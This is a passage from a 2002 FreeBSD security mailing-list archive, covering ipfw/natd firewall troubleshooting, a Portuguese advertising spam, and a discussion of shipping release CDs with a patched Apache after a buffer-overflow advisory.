firewall_script="/etc/rc.firewall" > > firewall_type="/etc/ipfw.rules" > > gateway_enable="YES" > > natd_enable="YES" > > natd_interface="xl0" > > natd_flags="-config /etc/natd_rules" > > inetd_flags="-wW -a 142.XX.XX.238" > > portmap_enable="NO" > > syslogd_flags="-ss" > > > > > > -------------- > > > > # > > # natd config (/etc/natd_config) > :> # > > redirect_port tcp 192.168.200.13:22 22 > > > > > > -------------- > > > > # > > # my ipfw.rules (additional to rc.firewall defaults) > > # > > #make sure natd gets a hold of the packets prior to FIREWALL > > add 00320 divert natd all from any to any via xl0 > > # > > # > > # from man 8 ipfw: allow only outbound TCP connections I've created > > add 00350 check-state > > add 00351 deny tcp from any to any in established > > add 00352 allow tcp from any to any out setup keep-state > > # > > # > > #allow DNS > > add 00400 allow udp from 142.XX.XX.1 to any in recv xl0 > > add 00401 allow udp from 142.XX.XX.2 to any in recv xl0 > > add 00402 allow udp from 142.XX.XX.3 to any in recv xl0 > > add 00403 allow udp from any to any out > > # > > #allow some ICMP types (codes not supported) > > ## allow path-mtu in both directions > > add 00600 allow icmp from any to any icmptypes 3 > > ## allow source quench in and out > > add 00601 allow icmp from any to any icmptypes 4 > > ## allow me to ping out and receive response back > > add 00602 allow icmp from any to any icmptypes 8 out > > add 00603 allow icmp from any to any icmptypes 0 in > > ## allow me to traceroute > > # > > # when I traceroute, I send out UDP packets (rule 00403) > > # > > add 00604 allow icmp from any to any icmptypes 11 in > > # > > # > > # enable www server on dagobah (142.XX.XX.238) > > add 00700 allow tcp from any to any 80 in via xl0 > > add 00701 allow tcp from any to any 80 out via xl0 > > # > > # > > # enable ssh server on dagobah (142.XX.XX.238) > > add 00702 allow tcp from any to any 777 in via xl0 > > add 00703 allow tcp from any to any 777 out via xl0 > > # > > # > > # enable ssh server on darkside (142.XX.XX.238) > > add 00704 allow tcp from any to any 22 in via xl0 > > add 00705 allow tcp from any to any 22 out via xl0 > > > > > > -------------- > > > > OUTPUT OF THE IPFW SHOW command > > > > 00100 0 0 allow ip from any to any via lo0 > > 00200 0 0 deny ip from any to 127.0.0.0/8 > > 00300 0 0 deny ip from 127.0.0.0/8 to any > > 00320 171 34652 divert 8668 ip from any to any via xl0 > > 00350 0 0 check-state > > 00351 0 0 deny tcp from any to any in established > > 00352 78 8668 allow tcp from any to any keep-state out setup > > 00400 2 482 allow udp from 142.XX.XX.1 to any in recv xl0 > > 00401 0 0 allow udp from 142.XX.XX.2 to any in recv xl0 > > 00402 0 0 allow udp from 142.XX.XX.3 to any in recv xl0 > > 00403 2 120 allow udp from any to any out > > 00600 0 0 allow icmp from any to any icmptype 3 > > 00601 0 0 allow icmp from any to any icmptype 4 > > 00602 0 0 allow icmp from any to any out icmptype 8 > > 00603 0 0 allow icmp from any to any in icmptype 0 > > 00604 0 0 allow icmp from any to any in icmptype 11 > > 00700 3 144 allow tcp from any to any 80 in recv xl0 > > 00701 0 0 allow tcp from any to any 80 out xmit xl0 > > 00702 0 0 allow tcp from any to any 777 in recv xl0 > > 00703 0 0 allow tcp from any to any 777 out xmit xl0 > > 00704 0 0 allow tcp from any to any 22 in recv xl0 > > 00705 0 0 allow tcp from any to any 22 out xmit xl0 > > 65535 86 25238 deny ip from any to any > > > > __ > > grimm > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 11: 5:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1800137B433 for ; Mon, 17 Jun 2002 11:04:16 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HI4FV88912 for security@freebsd.org; Mon, 17 Jun 2002 11:04:15 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 17 Jun 2002 11:04:15 -0700 (PDT) Message-Id: <200206171804.g5HI4FV88912@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 15:45:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from uol.com.br (proxy.nida.ac.th [203.151.38.3]) by hub.freebsd.org (Postfix) with SMTP id 34BE037B415; Mon, 17 Jun 2002 15:42:08 -0700 (PDT) Reply-To: "Atendimento on-line" From: "Atendimento on-line" Subject: Atendimento on-line Date: Wed, 12 Jun 2002 15:02:24 -0300 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000F_01C21222.49FCAF80" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020617224208.34BE037B415@hub.freebsd.org> To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_000F_01C21222.49FCAF80 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Frente a frente com o seu cliente no atendimento on-line O sistema de atendimento on- line permite que o seu cliente = troque informa=E7=F5es (mensagens) instantaneamente, com algu=E9m de sua = empresa. Comunica=E7=E3o on-line sem a necessidade de nenhum software ou = plugin adicional, direto do seu WEBSITE. Proporciona um atendimento r=E1pido e eficaz para o seu cliente, = n=E3o havendo a necessidade de esperar o retorno de um e-mail ou uma = chamada telef=F4nica. Isso tudo no exato momento em que o seu cliente = precisa da sua ajuda, n=E3o permitindo que ele perca o interesse pelo = seu produto ou servi=E7o. Per=EDodo de avalia=E7=E3o gratuito (15 dias) Visite o nosso site para conhecer esta ferramenta de trabalho www.spinadesign.com.br/atendimentoonline=20 Tel.: (11) 6865-6249 5579-2815 email: atendimentoonline@spinadesign.com.br=20 Desculpe-nos se nosso contado foi inoportuno ou n=E3o lhe = interessa. Click aqui para ser removido de nosso mailing. =20 =20 =20 =20 =20 =20 ------=_NextPart_000_000F_01C21222.49FCAF80 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

Frente a frente com o seu cliente no = atendimento=20 on-line

O sistema de=20 atendimento on- line permite que  o seu cliente troque = informa=E7=F5es=20 (mensagens) instantaneamente, com=20 algu=E9m de sua empresa. Comunica=E7=E3o on-line sem a necessidade de nenhum software ou = plugin=20 adicional, direto do seu WEBSITE.

Proporciona um = atendimento r=E1pido=20 e eficaz para o seu cliente, n=E3o havendo a necessidade de = esperar o=20 retorno de um e-mail ou uma chamada telef=F4nica. Isso tudo no = exato momento=20 em que o seu cliente precisa da sua ajuda, n=E3o permitindo que = ele perca o=20 interesse pelo seu produto ou servi=E7o.

Per=EDodo de=20 avalia=E7=E3o gratuito (15 dias)

Visite o nosso site=20 para conhecer esta ferramenta de trabalho
www.spinadesign.= com.br/atendimentoonline=20

Tel.: (11)=20 6865-6249   5579-2815

email: atendimentoonline@sp= inadesign.com.br 

Desculpe-nos se=20 nosso contado foi inoportuno ou n=E3o lhe interessa. Click = aqui para=20 ser removido de nosso  mailing.
------=_NextPart_000_000F_01C21222.49FCAF80-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 21:57:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 6F80D37B440 for ; Mon, 17 Jun 2002 21:57:13 -0700 (PDT) Received: 8.12.2-(Neptune) From: "Nielsen" To: "grimm" Cc: References: <20020616134201.529b01aa.grimm@planetquake.com><200206170035.g5H0Zr3g029046@mail2.gamespy.com> <20020616224440.46dcdfaa.grimm@planetquake.com> Subject: Re: ipfw-ntad-jail MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020618045713.6F80D37B440@hub.freebsd.org> Date: Mon, 17 Jun 2002 21:57:13 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > Lastly, I would check that the packets are in fact getting NAT'd in. > > It may be the out that's the problem. > > How do I check that? I would disable the onepass setting above and put appropriate count and allow rules around the divert rule in the firewall. Then you could see exactly how it was getting translated. Secondly you could run natd with the logging option and you'll get some statistics out of there. > >I think in addition to the > > redirect_tcp you also have to do a proper NAT thing. In my > > inderstanding, redirections open holes to let stuff in, but for the > > packets to get back out proper Natting is required. OTOH, most of my > > experience is with ipnat, so I'm not sure here. > > I am not sure if there is a proper nat thing required, cause > from within the machine, I can ssh and telnet to the jail no problem. > Do you think, given that it works from within, that it could still be > a problem? Within your machine normal routing is used to access any aliased IP. In fact it would probably be better if before the divert rule in your firewall you specifically allowed local traffic (so it doesn't get NAT'd). > I am trying right now, just to figure out why my web server, > and ssh on the host (dagobah) aren't responding. It seems like there > is something fundamentally wrong with my firewall rules. Hmmm, yes you're probably right there. Try enabling logging on any rule that blocks and then look at /var/log/security to see exactly which one it is and for which packets. Sometimes it's hard to tell from just looking at the rules what actually happens. All the best, Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 21:58:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 56EAF37B43C for ; Mon, 17 Jun 2002 21:57:58 -0700 (PDT) Received: 8.12.2-(Neptune) From: "Nielsen" To: "grimm" Cc: References: <20020616134201.529b01aa.grimm@planetquake.com><200206170035.g5H0Zr3g029046@mail2.gamespy.com> <20020616224440.46dcdfaa.grimm@planetquake.com> Subject: Re: ipfw-ntad-jail MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020618045758.56EAF37B43C@hub.freebsd.org> Date: Mon, 17 Jun 2002 21:57:58 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > No one has been able to pinpoint an exact major problem that > could cause this. I think once I fix that, I could then concentrate > on the jail issue. But right now, the simplest thing isn't working! Something else just dawned on me. In order to get traffic coming into NAT to get forwarded to the host system, you need an option like this (for natd): -target_address 0.0.0.0 See man natd Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 22:40: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 1412D37B411 for ; Mon, 17 Jun 2002 22:39:59 -0700 (PDT) Received: (from brett@localhost) by lariat.org (8.9.3/8.9.3) id XAA26264 for security@freebsd.org; Mon, 17 Jun 2002 23:39:49 -0600 (MDT) Date: Mon, 17 Jun 2002 23:39:49 -0600 (MDT) From: Brett Glass Message-Id: <200206180539.XAA26264@lariat.org> To: security@freebsd.org Subject: CDs with patched Apache? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org As many folks are already aware, the version of Apache that's included in the FreeBSD ports and packages is subject to a buffer overflow which (at best) can cause a DoS and (at worst) can be used as a remote root exploit. The authors of the advisory from apache.org say that they believe 32-bit Unices can only be DoSed (see http://www.cert.org/advisories/CA-2002-17.html). But given the cleverness of skript creators, and the large number of potential target systems (Apache drives more than half the Web servers on the Net), we can't be 100% sure that someone won't find a clever way to smash the stack and root FreeBSD systems running vulnerable versions of Apache. Since Apache is one of the most commonly installed ports, disc vendors should strongly consider mastering their discs with a patched Apache. What's the status of the CDs and DVDs from various vendors? Will it be possible for them to "stop press" and do this? --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 22:51: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 58CCE37B409 for ; Mon, 17 Jun 2002 22:50:57 -0700 (PDT) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.3/8.12.3) with ESMTP id g5I5ouCV052136; Mon, 17 Jun 2002 22:50:56 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.3/8.12.3/Submit) id g5I5ouhA052135; Mon, 17 Jun 2002 22:50:56 -0700 (PDT) (envelope-from dillon) Date: Mon, 17 Jun 2002 22:50:56 -0700 (PDT) From: Matthew Dillon Message-Id: <200206180550.g5I5ouhA052135@apollo.backplane.com> To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: CDs with patched Apache? References: <200206180539.XAA26264@lariat.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org :As many folks are already aware, the version of Apache that's included in the :FreeBSD ports and packages is subject to a buffer overflow which (at best) can :cause a DoS and (at worst) can be used as a remote root exploit. The authors :of the advisory from apache.org say that they believe 32-bit Unices can only :be DoSed (see http://www.cert.org/advisories/CA-2002-17.html). But given the :cleverness of skript creators, and the large number of potential target :systems (Apache drives more than half the Web servers on the Net), we can't be :100% sure that someone won't find a clever way to smash the stack and root :FreeBSD systems running vulnerable versions of Apache. : :Since Apache is one of the most commonly installed ports, disc vendors should :strongly consider mastering their discs with a patched Apache. What's the :status of the CDs and DVDs from various vendors? Will it be possible for them :to "stop press" and do this? : :--Brett Glass I don't think having the CD vendors hold up the release can be justified. Certainly the timing is bad.. it would have been nice to get the new Apache in, but security issues pop up all the time and I really doubt that most commercial users of FreeBSD actually install Apache from the CD. I don't know, of course, but that's my feeling. (I am far more worried about the ATA CDRom driver problems that are preventing a lot of people from installing the release. That might be sufficient to roll new ISOs if the problem can be fixed quickly, but I think it is too late even for something like that and if it is too late for that it is certainly too late to roll new ISOs to get a newer Apache). -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 17 23:31:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from blort.org (blort.org [208.8.184.14]) by hub.freebsd.org (Postfix) with ESMTP id 2E35337B405 for ; Mon, 17 Jun 2002 23:31:23 -0700 (PDT) Received: by blort.org (Postfix, from userid 1001) id BBC2121051; Mon, 17 Jun 2002 23:31:08 -0700 (PDT) Date: Mon, 17 Jun 2002 23:31:08 -0700 From: Kameron Gasso To: Brett Glass Cc: security@freebsd.org Subject: Re: CDs with patched Apache? Message-ID: <20020617233108.A84129@blort.org> Reply-To: kgasso@blort.org References: <200206180539.XAA26264@lariat.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200206180539.XAA26264@lariat.org>; from brett@lariat.org on Mon, Jun 17, 2002 at 11:39:49PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --DocE+STaALJfprDB Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable * At 22:40PDT on 06/17/2002, Brett Glass wrote: > Since Apache is one of the most commonly installed ports, disc vendors sh= ould > strongly consider mastering their discs with a patched Apache. What's the > status of the CDs and DVDs from various vendors? Will it be possible for = them > to "stop press" and do this? Wasn't the fact that -RELEASE branches don't get updated with new packages = already discussed extensively in the not-so-distant past? Although it wouldn't be very glamorous (and I certainly wouldn't reccommend= it), the port installed with the latest -RELEASE could be "broken" so it w= ouldn't download and install without someone forcing it. Still, this would= n't really encourage them to upgrade their ports tree - it'd more than like= ly just cause much swearing and force people to work around the problem. Long story short, no OS can keep an inexperienced admin from opening it up = to security vulnerabilities... This is just another case of bad timing. Not a lot that can be done. Shou= ldn't we just follow the same precedence set from prior security issues whi= ch were installable from the base system (BIND, OpenSSH, etc.)? =20 Regards, --=20 Kameron Gasso PGP key at http://blort.org/~kgasso/pgpkey.txt --DocE+STaALJfprDB Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE9DtOsRa4UJDpmZqQRAmmPAJ0TXJYYxOpfOYvuhLFSpKJe+ubgvgCeL75P 6tGoM+AeHHBuNpcNcOxNWAQ= =p2Iu -----END PGP SIGNATURE----- --DocE+STaALJfprDB-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 2:49:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 73C8E37B404 for ; Tue, 18 Jun 2002 02:49:55 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id DAA27845; Tue, 18 Jun 2002 03:49:30 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020618033604.00d42aa0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 18 Jun 2002 03:49:28 -0600 To: kgasso@blort.org From: Brett Glass Subject: Re: CDs with patched Apache? Cc: security@FreeBSD.ORG In-Reply-To: <20020617233108.A84129@blort.org> References: <200206180539.XAA26264@lariat.org> <200206180539.XAA26264@lariat.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:31 AM 6/18/2002, Kameron Gasso wrote: >Wasn't the fact that -RELEASE branches don't get updated with new packages already discussed extensively in the not-so-distant past? Some folks yelled at me for pointing it out, but alas there was no real discussion of how to solve the problem. >Although it wouldn't be very glamorous (and I certainly wouldn't reccommend it), the port installed with the latest -RELEASE could be "broken" so it wouldn't download and install without someone forcing it. Still, this wouldn't really encourage them to upgrade their ports tree - it'd more than likely just cause much swearing and force people to work around the problem. It'd still be a warning. Hmmm.... Maybe the warning could be made part of pkg_add, and/or something that pkg_add executed. It would simply say, "proceed at your own risk!" But if you were installing from CD, you wouldn't be warned. Unless.... Unless pkg_add phoned home to check on the package. Which is possible if the machine can be connected to the Net. >Long story short, no OS can keep an inexperienced admin from opening it up to security vulnerabilities... > >This is just another case of bad timing. Not a lot that can be done. Shouldn't we just follow the same precedence set from prior security issues which were installable from the base system (BIND, OpenSSH, etc.)? I'd still like to come up with something better. But right now, I have a very practical reason for asking for a "clean" CD set. What I'm looking for is a CD set that I can hand out for evangelistic purposes -- something that a new user can use to set up a trouble-free Web server. Obviously, if it has a vulnerable version of Apache (it'll probably be targeted by a worm within a week), it won't be trouble-free! Ditto if the ATAPI CD-ROM problem isn't fixed. (Matt's right; this is important.) One thing about open source -- as Murray Stokely has pointed out -- is that it's OK to miss a ship date to get things working right. If I were a CD manufacturer, I'd strongly consider waiting until I could ship discs with the two problems mentioned above fixed. The purpose of my query was simply to find out if one of the vendors was (a) holding off on shipping; or (b) planning to revise its CD set once the problems were fixed. (I could imagine doing a smaller run in anticipation of this.) Such a vendor would get bragging rights; it would be able to say it had a less buggy and more secure snapshot. So, I'm hoping that one will. --Brett P.S. -- Like your domain name. After Don Martin, I assume? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 5:25: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 3622537B400 for ; Tue, 18 Jun 2002 05:25:02 -0700 (PDT) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.36 #1) id 17KI2m-00024M-00; Tue, 18 Jun 2002 14:25:08 +0200 From: Sheldon Hearn To: Brett Glass Cc: kgasso@blort.org, security@FreeBSD.ORG Subject: Re: CDs with patched Apache? In-reply-to: Your message of "Tue, 18 Jun 2002 03:49:28 CST." <4.3.2.7.2.20020618033604.00d42aa0@localhost> Date: Tue, 18 Jun 2002 14:25:08 +0200 Message-ID: <7957.1024403108@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 18 Jun 2002 03:49:28 CST, Brett Glass wrote: > But if you were installing from CD, you wouldn't be warned. Unless.... > Unless pkg_add phoned home to check on the package. Which is possible > if the machine can be connected to the Net. If we can't reroll the ISO, all is not lost. The issue can be documented in the release ERRATA online for those who pull down the ISO and in a printed ERRATA note inside CD / DVD packaging for those who buy such packages. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 6: 5:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 6027837B406 for ; Tue, 18 Jun 2002 06:05:39 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5ID5N123976; Tue, 18 Jun 2002 08:05:24 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5ID5NB29579; Tue, 18 Jun 2002 08:05:23 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5ID5K629572; Tue, 18 Jun 2002 08:05:20 -0500 (CDT) Message-ID: <3D0F3010.A9F0995A@centtech.com> Date: Tue, 18 Jun 2002 08:05:20 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Sheldon Hearn Cc: Brett Glass , kgasso@blort.org, security@freebsd.org Subject: Re: CDs with patched Apache? References: <7957.1024403108@axl.seasidesoftware.co.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Why not fix the bugs, and anything else that comes along in the next week or so (or however long it takes to fix the bugs and rebuild iso's), and release a 4.6.1? Maybe FreeBSD needs an "security update check" tool built into sysinstall, that will do something like: If system is being installed from the net, or installing packages from the net, automatically grab the update list, and show user possible security risks - possibly asking the user if they would like to upgrade their package/system right then. If system is not being installed or installing packages from the net, ask the user if they would like to connect to the net to do the checking. I think most commercial admins subscribe to the security lists, and will "do the right thing", but it's the other half of the FreeBSD users that I would worry about. There is a reason that almost all OS's are using this tactic to get updates and patches installed. If this was a seperate tool, it could be used to easily show the admin what packages are at risk on the box, without the need to manually match up pkg's installed versus packages at risk. Heck, I think I'll look for a tool that does that now, and if there isn't one, I'll write one myself. Eric Sheldon Hearn wrote: > > On Tue, 18 Jun 2002 03:49:28 CST, Brett Glass wrote: > > > But if you were installing from CD, you wouldn't be warned. Unless.... > > Unless pkg_add phoned home to check on the package. Which is possible > > if the machine can be connected to the Net. > > If we can't reroll the ISO, all is not lost. The issue can be > documented in the release ERRATA online for those who pull down the > ISO and in a printed ERRATA note inside CD / DVD packaging for those who > buy such packages. > > Ciao, > Sheldon. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology Torque, it makes the world go 'round. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 6:12:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 565AC37B400 for ; Tue, 18 Jun 2002 06:12:51 -0700 (PDT) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.36 #1) id 17KInJ-0002IG-00; Tue, 18 Jun 2002 15:13:13 +0200 From: Sheldon Hearn To: Eric Anderson Cc: Brett Glass , kgasso@blort.org, security@freebsd.org Subject: Re: CDs with patched Apache? In-reply-to: Your message of "Tue, 18 Jun 2002 08:05:20 EST." <3D0F3010.A9F0995A@centtech.com> Date: Tue, 18 Jun 2002 15:13:13 +0200 Message-ID: <8819.1024405993@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 18 Jun 2002 08:05:20 EST, Eric Anderson wrote: > Why not fix the bugs, and anything else that comes along in the next > week or so (or however long it takes to fix the bugs and rebuild > iso's), and release a 4.6.1? That's a lot more work than an errata note. :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 6:23: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 320B037B400 for ; Tue, 18 Jun 2002 06:23:04 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5IDN2124518; Tue, 18 Jun 2002 08:23:02 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5IDN2s00693; Tue, 18 Jun 2002 08:23:02 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5IDMx600686; Tue, 18 Jun 2002 08:22:59 -0500 (CDT) Message-ID: <3D0F3433.4CA0FCA5@centtech.com> Date: Tue, 18 Jun 2002 08:22:59 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Tig Cc: freebsd-security@freebsd.org Subject: Re: CDs with patched Apache? References: <7957.1024403108@axl.seasidesoftware.co.za> <3D0F3010.A9F0995A@centtech.com> <20020618151739.0e099fe9.tigger@onemoremonkey.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks Tig. I stubbled across your tool the other day. It looks like it's more designed to do a full system upgrade, right? I'm thinking a simple tool to basically show you what needs to be updated (at risk items only - not feature updates). Eric Tig wrote: > > http://lvl.sf.net/autoupdate.php > > Something I've start work on... > (i can not post to the FreeBSD list however) > > On Tue, 18 Jun 2002 08:05:20 -0500 > Eric Anderson wrote: > > > Why not fix the bugs, and anything else that comes along in the next week or so > > (or however long it takes to fix the bugs and rebuild iso's), and release a > > 4.6.1? > > > > Maybe FreeBSD needs an "security update check" tool built into sysinstall, that > > will do something like: > > > -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology Torque, it makes the world go 'round. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 6:25:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 55C2137B401 for ; Tue, 18 Jun 2002 06:25:08 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP 